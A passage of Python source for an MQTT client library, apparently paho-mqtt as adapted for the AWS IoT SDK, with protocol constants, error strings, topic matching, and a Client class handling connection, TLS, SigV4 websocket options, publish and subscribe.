PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish= 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
# MessageQueueing DropBehavior
MSG_QUEUEING_DROP_OLDEST = 0
MSG_QUEUEING_DROP_NEWEST = 1
if sys.version_info[0] < 3:
sockpair_data = "0"
else:
sockpair_data = b"0"
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == 0:
return "Connection Accepted."
elif connack_code == 1:
return "Connection Refused: unacceptable protocol version."
elif connack_code == 2:
return "Connection Refused: identifier rejected."
elif connack_code == 3:
return "Connection Refused: broker unavailable."
elif connack_code == 4:
return "Connection Refused: bad user name or password."
elif connack_code == 5:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
result = True
multilevel_wildcard = False
slen = len(sub)
tlen = len(topic)
if slen > 0 and tlen > 0:
if (sub[0] == '$' and topic[0] != '$') or (topic[0] == '$' and sub[0] != '$'):
return False
spos = 0
tpos = 0
while spos < slen and tpos < tlen:
if sub[spos] == topic[tpos]:
if tpos == tlen-1:
# Check for e.g. foo matching foo/#
if spos == slen-3 and sub[spos+1] == '/' and sub[spos+2] == '#':
result = True
multilevel_wildcard = True
break
spos += 1
tpos += 1
if tpos == tlen and spos == slen-1 and sub[spos] == '+':
spos += 1
result = True
break
else:
if sub[spos] == '+':
spos += 1
while tpos < tlen and topic[tpos] != '/':
tpos += 1
if tpos == tlen and spos == slen:
result = True
break
elif sub[spos] == '#':
multilevel_wildcard = True
if spos+1 != slen:
result = False
break
else:
result = True
break
else:
result = False
break
if not multilevel_wildcard and (tpos < tlen or spos < slen):
result = False
return result
def _socketpair_compat():
"""TCP/IP socketpair including Windows support"""
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
listensock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensock.bind(("127.0.0.1", 0))
listensock.listen(1)
iface, port = listensock.getsockname()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
sock1.setblocking(0)
try:
sock1.connect(("127.0.0.1", port))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
sock2, address = listensock.accept()
sock2.setblocking(0)
listensock.close()
return (sock1, sock2)
class MQTTMessage:
""" This is a class that describes an incoming message. It is passed to the
on_message callback as the message parameter.
Members:
topic : String. topic that the message was published on.
payload : String/bytes the message payload.
qos : Integer. The message Quality of Service 0, 1 or 2.
retain : Boolean. If true, the message is a retained message and not fresh.
mid : Integer. The message id.
"""
def __init__(self):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = 0
self.topic = ""
self.payload = None
self.qos = 0
self.retain = False
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
General usage flow:
* Use connect()/connect_async() to connect to a broker
* Call loop() frequently to maintain network traffic flow with the broker
* Or use loop_start() to set a thread running to call loop() for you.
* Or use loop_forever() to handle calling loop() for you in a blocking
* function.
* Use subscribe() to subscribe to a topic and receive messages
* Use publish() to send messages
* Use disconnect() to disconnect from the broker
Data returned from the broker is made available with the use of callback
functions as described below.
Callbacks
=========
A number of callback functions are available to receive data back from the
broker. To use a callback, define a function and then assign it to the
client:
def on_connect(client, userdata, flags, rc):
print("Connection returned " + str(rc))
client.on_connect = on_connect
All of the callbacks as described below have a "client" and an "userdata"
argument. "client" is the Client instance that is calling the callback.
"userdata" is user data of any type and can be set when creating a new client
instance or with user_data_set(userdata).
The callbacks:
on_connect(client, userdata, flags, rc): called when the broker responds to our connection
request.
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc determines success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
on_disconnect(client, userdata, rc): called when the client disconnects from the broker.
The rc parameter indicates the disconnection state. If MQTT_ERR_SUCCESS
(0), the callback was called in response to a disconnect() call. If any
other value the disconnection was unexpected, such as might be caused by
a network error.
on_message(client, userdata, message): called when a message has been received on a
topic that the client subscribes to. The message variable is a
MQTTMessage that describes all of the message parameters.
on_publish(client, userdata, mid): called when a message that was to be sent using the
publish() call has completed transmission to the broker. For messages
with QoS levels 1 and 2, this means that the appropriate handshakes have
completed. For QoS 0, this simply means that the message has left the
client. The mid variable matches the mid variable returned from the
corresponding publish() call, to allow outgoing messages to be tracked.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent.
on_subscribe(client, userdata, mid, granted_qos): called when the broker responds to a
subscribe request. The mid variable matches the mid variable returned
from the corresponding subscribe() call. The granted_qos variable is a
list of integers that give the QoS level the broker has granted for each
of the different subscription requests.
on_unsubscribe(client, userdata, mid): called when the broker responds to an unsubscribe
request. The mid variable matches the mid variable returned from the
corresponding unsubscribe() call.
on_log(client, userdata, level, buf): called when the client has log information. Define
to allow debugging. The level variable gives the severity of the message
and will be one of MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG. The message itself is in buf.
"""
def __init__(self, client_id="", clean_session=True, userdata=None, protocol=MQTTv31, useSecuredWebsocket=False):
"""client_id is the unique client id string used when connecting to the
broker. If client_id is zero length or None, then one will be randomly
generated. In this case, clean_session must be True. If this is not the
case a ValueError will be raised.
clean_session is a boolean that determines the client type. If True,
the broker will remove all information about this client when it
disconnects. If False, the client is a persistent client and
subscription information and queued messages will be retained when the
client disconnects.
Note that a client will never discard its own outgoing messages on
disconnect. Calling connect() or reconnect() will cause the messages to
be resent. Use reinitialise() to reset a client to its original state.
userdata is user defined data of any type that is passed as the "userdata"
parameter to callbacks. It may be updated at a later point with the
user_data_set() function.
The protocol argument allows explicit setting of the MQTT version to
use for this client. Can be paho.mqtt.client.MQTTv311 (v3.1.1) or
paho.mqtt.client.MQTTv31 (v3.1), with the default being v3.1. If the
broker reports that the client connected with an invalid protocol
version, the client will automatically attempt to reconnect using v3.1
instead.
useSecuredWebsocket is a boolean that determines whether the client uses
MQTT over Websocket with sigV4 signing (True) or MQTT with plain TCP
socket. If True, the client will try to find AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY in the system environment variables and start the
sigV4 signing and Websocket handshake. Under this configuration, all
outbound MQTT packets will be wrapped around with Websocket framework. All
inbound MQTT packets will be automatically wss-decoded.
"""
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._sockpairR, self._sockpairW = _socketpair_compat()
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
self._clean_session = clean_session
if client_id == "" or client_id is None:
self._client_id = "paho/" + "".join(random.choice("0123456789ADCDEF") for x in range(23-5))
else:
self._client_id = client_id
self._username = ""
self._password = ""
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = []
self._current_out_packet = None
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._max_inflight_messages = 20
self._out_messages = []
self._in_messages = []
self._inflight_messages = 0
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
self.on_disconnect = None
self.on_connect = None
self.on_publish = None
self.on_message = None
self.on_message_filtered = []
self.on_subscribe = None
self.on_unsubscribe = None
self.on_log = None
self._host = ""
self._port = 1883
self._bind_address = ""
self._socket_factory = None
self._in_callback = False
self._strict_protocol = False
self._callback_mutex = threading.Lock()
self._state_mutex = threading.Lock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.Lock()
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.Lock()
self._in_message_mutex = threading.Lock()
self._thread = None
self._thread_terminate = False
self._ssl = None
self._tls_certfile = None
self._tls_keyfile = None
self._tls_ca_certs = None
self._tls_cert_reqs = None
self._tls_ciphers = None
self._tls_version = tls_version
self._tls_insecure = False
self._useSecuredWebsocket = useSecuredWebsocket # Do we enable secured websocket
self._backoffCore = ProgressiveBackOffCore() # Init the backoffCore using default configuration
self._AWSAccessKeyIDCustomConfig = ""
self._AWSSecretAccessKeyCustomConfig = ""
self._AWSSessionTokenCustomConfig = ""
self._alpn_protocols = None
def __del__(self):
pass
def setBackoffTiming(self, srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond):
"""
Make custom settings for backoff timing for reconnect logic
srcBaseReconnectTimeSecond - The base reconnection time in seconds
srcMaximumReconnectTimeSecond - The maximum reconnection time in seconds
srcMinimumConnectTimeSecond - The minimum time in seconds that a connection must be maintained in order to be considered stable
* Raise ValueError if input params are malformed
"""
self._backoffCore.configTime(srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond)
def configIAMCredentials(self, srcAWSAccessKeyID, srcAWSSecretAccessKey, srcAWSSessionToken):
"""
Make custom settings for IAM credentials for websocket connection
srcAWSAccessKeyID - AWS IAM access key
srcAWSSecretAccessKey - AWS IAM secret key
srcAWSSessionToken - AWS Session Token
"""
self._AWSAccessKeyIDCustomConfig = srcAWSAccessKeyID
self._AWSSecretAccessKeyCustomConfig = srcAWSSecretAccessKey
self._AWSSessionTokenCustomConfig = srcAWSSessionToken
def config_alpn_protocols(self, alpn_protocols):
"""
Make custom settings for ALPN protocols
:param alpn_protocols: Array of strings that specifies the alpn protocols to be used
:return: None
"""
self._alpn_protocols = alpn_protocols
def reinitialise(self, client_id="", clean_session=True, userdata=None):
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
if self._sockpairR:
self._sockpairR.close()
self._sockpairR = None
if self._sockpairW:
self._sockpairW.close()
self._sockpairW = None
self.__init__(client_id, clean_session, userdata)
def tls_set(self, ca_certs, certfile=None, keyfile=None, cert_reqs=cert_reqs, tls_version=tls_version, ciphers=None):
"""Configure network encryption and authentication options. Enables SSL/TLS support.
ca_certs : a string path to the Certificate Authority certificate files
that are to be treated as trusted by this client. If this is the only
option given then the client will operate in a similar manner to a web
browser. That is to say it will require the broker to have a
certificate signed by the Certificate Authorities in ca_certs and will
communicate using TLS v1, but will not attempt any form of
authentication. This provides basic network encryption but may not be
sufficient depending on how the broker is configured.
certfile and keyfile are strings pointing to the PEM encoded client
certificate and private keys respectively. If these arguments are not
None then they will be used as client information for TLS based
authentication. Support for this feature is broker dependent. Note
that if either of these files in encrypted and needs a password to
decrypt it, Python will ask for the password at the command line. It is
not currently possible to define a callback to provide the password.
cert_reqs allows the certificate requirements that the client imposes
on the broker to be changed. By default this is ssl.CERT_REQUIRED,
which means that the broker must provide a certificate. See the ssl
pydoc for more information on this parameter.
tls_version allows the version of the SSL/TLS protocol used to be
specified. By default TLS v1 is used. Previous versions (all versions
beginning with SSL) are possible but not recommended due to possible
security problems.
ciphers is a string specifying which encryption ciphers are allowable
for this connection, or None to use the defaults. See the ssl pydoc for
more information.
Must be called before connect() or connect_async()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
if sys.version < '2.7':
raise ValueError('Python 2.7 is the minimum supported version for TLS.')
if ca_certs is None:
raise ValueError('ca_certs must not be None.')
try:
f = open(ca_certs, "r")
except IOError as err:
raise IOError(ca_certs+": "+err.strerror)
else:
f.close()
if certfile is not None:
try:
f = open(certfile, "r")
except IOError as err:
raise IOError(certfile+": "+err.strerror)
else:
f.close()
if keyfile is not None:
try:
f = open(keyfile, "r")
except IOError as err:
raise IOError(keyfile+": "+err.strerror)
else:
f.close()
self._tls_ca_certs = ca_certs
self._tls_certfile = certfile
self._tls_keyfile = keyfile
self._tls_cert_reqs = cert_reqs
self._tls_version = tls_version
self._tls_ciphers = ciphers
def tls_insecure_set(self, value):
"""Configure verification of the server hostname in the server certificate.
If value is set to true, it is impossible to guarantee that the host
you are connecting to is not impersonating your server. This can be
useful in initial server testing, but makes it possible for a malicious
third party to impersonate your server through DNS spoofing, for
example.
Do not use this function in a real system. Setting value to true means
there is no point using encryption.
Must be called before connect()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
self._tls_insecure = value
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_srv(self, domain=None, keepalive=60, bind_address=""):
"""Connect to a remote broker.
domain is the DNS domain to search for SRV records; if None,
try to determine local domain name.
keepalive and bind_address are as for connect()
"""
if HAVE_DNS is False:
raise ValueError('No DNS resolver library found.')
if domain is None:
domain = socket.getfqdn()
domain = domain[domain.find('.') + 1:]
try:
rr = '_mqtt._tcp.%s' % domain
if self._ssl is not None:
# IANA specifies secure-mqtt (not mqtts) for port 8883
rr = '_secure-mqtt._tcp.%s' % domain
answers = []
for answer in dns.resolver.query(rr, dns.rdatatype.SRV):
addr = answer.target.to_text()[:-1]
answers.append((addr, answer.port, answer.priority, answer.weight))
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
raise ValueError("No answer/NXDOMAIN for SRV in %s" % (domain))
# FIXME: doesn't account for weight
for answer in answers:
host, port, prio, weight = answer
try:
return self.connect(host, port, keepalive, bind_address)
except:
pass
raise ValueError("No SRV hosts responded")
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide very quick
start.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
if bind_address != "" and bind_address is not None:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
raise ValueError('bind_address requires Python 2.7 or 3.2.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state_mutex.acquire()
self._state = mqtt_cs_connect_async
self._state_mutex.release()
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet_mutex.acquire()
self._out_packet = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.acquire()
self._current_out_packet = None
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._ping_t = 0
self._state_mutex.acquire()
self._state = mqtt_cs_new
self._state_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
try:
if self._socket_factory:
sock = self._socket_factory()
elif (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
sock = socket.create_connection((self._host, self._port))
else:
sock = socket.create_connection((self._host, self._port), source_address=(self._bind_address, 0))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
verify_hostname = self._tls_insecure is False # Decide whether we need to verify hostname
if self._tls_ca_certs is not None:
if self._useSecuredWebsocket:
# Never assign to ._ssl before wss handshake is finished
# Non-None value for ._ssl will allow ops before wss-MQTT connection is established
rawSSL = ssl.wrap_socket(sock, ca_certs=self._tls_ca_certs, cert_reqs=ssl.CERT_REQUIRED) # Add server certificate verification
rawSSL.setblocking(0) # Non-blocking socket
self._ssl = SecuredWebSocketCore(rawSSL, self._host, self._port, self._AWSAccessKeyIDCustomConfig, self._AWSSecretAccessKeyCustomConfig, self._AWSSessionTokenCustomConfig) # Override the _ssl socket
# self._ssl.enableDebug()
elif self._alpn_protocols is not None:
# SSLContext is required to enable ALPN support
# Assuming Python 2.7.10+/3.5+ till the end of this elif branch
ssl_context = SSLContextBuilder()\
.with_ca_certs(self._tls_ca_certs)\
.with_cert_key_pair(self._tls_certfile, self._tls_keyfile)\
.with_cert_reqs(self._tls_cert_reqs)\
.with_check_hostname(True)\
.with_ciphers(self._tls_ciphers)\
.with_alpn_protocols(self._alpn_protocols)\
.build()
self._ssl = ssl_context.wrap_socket(sock, server_hostname=self._host, do_handshake_on_connect=False)
verify_hostname = False # Since check_hostname in SSLContext is already set to True, no need to verify it again
self._ssl.do_handshake()
else:
self._ssl = ssl.wrap_socket(
sock,
certfile=self._tls_certfile,
keyfile=self._tls_keyfile,
ca_certs=self._tls_ca_certs,
cert_reqs=self._tls_cert_reqs,
ssl_version=self._tls_version,
ciphers=self._tls_ciphers)
if verify_hostname:
if sys.version_info[0] < 3 or (sys.version_info[0] == 3 and sys.version_info[1] < 5): # No IP host match before 3.5.x
self._tls_match_hostname()
else:
ssl.match_hostname(self._ssl.getpeercert(), self._host)
self._sock = sock
if self._ssl and not self._useSecuredWebsocket:
self._ssl.setblocking(0) # For X.509 cert mutual auth.
elif not self._ssl:
self._sock.setblocking(0) # For plain socket
else:
pass # For MQTT over WebSocket
return self._send_connect(self._keepalive, self._clean_session)
def loop(self, timeout=1.0, max_packets=1):
"""Process network events.
This function must be called regularly to ensure communication with the
broker is carried out. It calls select() on the network socket to wait
for network events. If incoming data is present it will then be
processed. Outgoing commands, from e.g. publish(), are normally sent
immediately that their function is called, but this is not always
possible. loop() will also attempt to send any remaining outgoing
messages, which also includes commands that are part of the flow for
messages with QoS>0.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
Returns MQTT_ERR_SUCCESS on success.
Returns >0 on error.
A ValueError will be raised if timeout < 0"""
if timeout < 0.0:
raise ValueError('Invalid timeout.')
self._current_out_packet_mutex.acquire()
self._out_packet_mutex.acquire()
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
if self._current_out_packet:
wlist = [self.socket()]
else:
wlist = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.release()
# sockpairR is used to break out of select() before the timeout, on a
# call to publish() etc.
rlist = [self.socket(), self._sockpairR]
try:
socklist = select.select(rlist, wlist, [], timeout)
except TypeError as e:
# Socket isn't correct type, in likelihood connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for
# some reason.
return MQTT_ERR_CONN_LOST
except:
return MQTT_ERR_UNKNOWN
if self.socket() in socklist[0]:
rc = self.loop_read(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
if self._sockpairR in socklist[0]:
# Stimulate output write even though we didn't ask for it, because
# at that point the publish or other command wasn't present.
socklist[1].insert(0, self.socket())
# Clear sockpairR - only ever a single byte written.
try:
self._sockpairR.recv(1)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self.socket() in socklist[1]:
rc = self.loop_write(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
return self.loop_misc()
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS to
indicate success or MQTT_ERR_NO_CONN if the client is not currently
connected. mid is the message ID for the publish request. The mid
value can be used to track the publish request by checking against the
mid argument in the on_publish() callback if it is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str) or isinstance(payload, bytearray):
local_payload = payload
elif sys.version_info[0] < 3 and isinstance(payload, unicode):
local_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
local_payload = str(payload)
elif payload is None:
local_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
if local_payload is not None and len(local_payload) > 268435455:
raise ValueError('Payload too large.')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
local_mid = self._mid_generate()
if qos == 0:
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False)
return (rc, local_mid)
else:
message = MQTTMessage()
message.timestamp = time.time()
message.mid = local_mid
message.topic = topic
if local_payload is None or len(local_payload) == 0:
message.payload = None
else:
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
self._out_message_mutex.acquire()
self._out_messages.append(message)
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages = self._inflight_messages+1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
self._out_message_mutex.release()
rc = self._send_publish(message.mid, message.topic, message.payload, message.qos, message.retain, message.dup)
# remove from inflight messages so it will be send after a connection is made
if rc is MQTT_ERR_NO_CONN:
with self._out_message_mutex:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
return (rc, local_mid)
else:
message.state = mqtt_ms_queued;
self._out_message_mutex.release()
return (MQTT_ERR_SUCCESS, local_mid)
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. Need have no relationship to the client id.
password: The password to authenticate with. Optional, set to None if not required.
"""
self._username = username.encode('utf-8')
self._password = password
def socket_factory_set(self, socket_factory):
"""Set a socket factory to custom configure a different socket type for
mqtt connection.
Must be called before connect() to have any effect.
socket_factory: create_connection function which creates a socket to user's specification
"""
self._socket_factory = socket_factory
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state_mutex.acquire()
self._state = mqtt_cs_disconnecting
self._state_mutex.release()
self._backoffCore.stopStableConnectionTimer()
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics.
This function may be called in three different ways:
Simple string and integer
-------------------------
e.g. subscribe("my/topic", 2)
topic: A string specifying the subscription topic to subscribe to.
qos: The desired quality of service level for the subscription.
Defaults to 0.
String and integer tuple
------------------------
e.g. subscribe(("my/topic", 1))
topic: A tuple of (topic, qos). Both topic and qos must be present in
the tuple.
qos: Not used.
List of string and integer tuples
------------------------
e.g. subscribe([("my/topic", 0), ("another/topic", 2)])
This allows multiple topic subscriptions in a single SUBSCRIPTION
command, which is more efficient than using multiple calls to
subscribe().
topic: A list of tuple of format (topic, qos). Both topic and qos must
be present in all of the tuples.
qos: Not used.
The function returns a tuple (result, mid), where result is
MQTT_ERR_SUCCESS to indicate success or (MQTT_ERR_NO_CONN, None) if the
client is not currently connected. mid is the message ID for the
subscribe request. The mid value can be used to track the subscribe
request by checking against the mid argument in the on_subscribe()
callback if it is defined.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length, or if topic is not a string, tuple or list.
"""
topic_qos_list = None
if isinstance(topic, str):
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, tuple):
if topic[1]<0 or topic[1]>2:
raise ValueError('Invalid QoS level.')
if topic[0] is None or len(topic[0]) == 0 or not isinstance(topic[0], str):
raise ValueError('Invalid topic.')
topic_qos_list = [(topic[0].encode('utf-8'), topic[1])]
elif isinstance(topic, list):
topic_qos_list = []
for t in topic:
if t[1]<0 or t[1]>2:
raise ValueError('Invalid QoS level.')
if t[0] is None or len(t[0]) == 0 or not isinstance(t[0], str):
raise ValueError('Invalid topic.')
topic_qos_list.append((t[0].encode('utf-8'), t[1]))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics.
topic: A single string, or list of strings that are the subscription
topics to unsubscribe from.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS
to indicate success or (MQTT_ERR_NO_CONN, None) if the client is not
currently connected.
mid is the message ID for the unsubscribe request. The mid value can be
used to track the unsubscribe request by checking against the mid
argument in the on_unsubscribe() callback if it is defined.
Raises a ValueError if topic is None or has zero string length, or is
not a string or list.
"""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, str):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, str):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
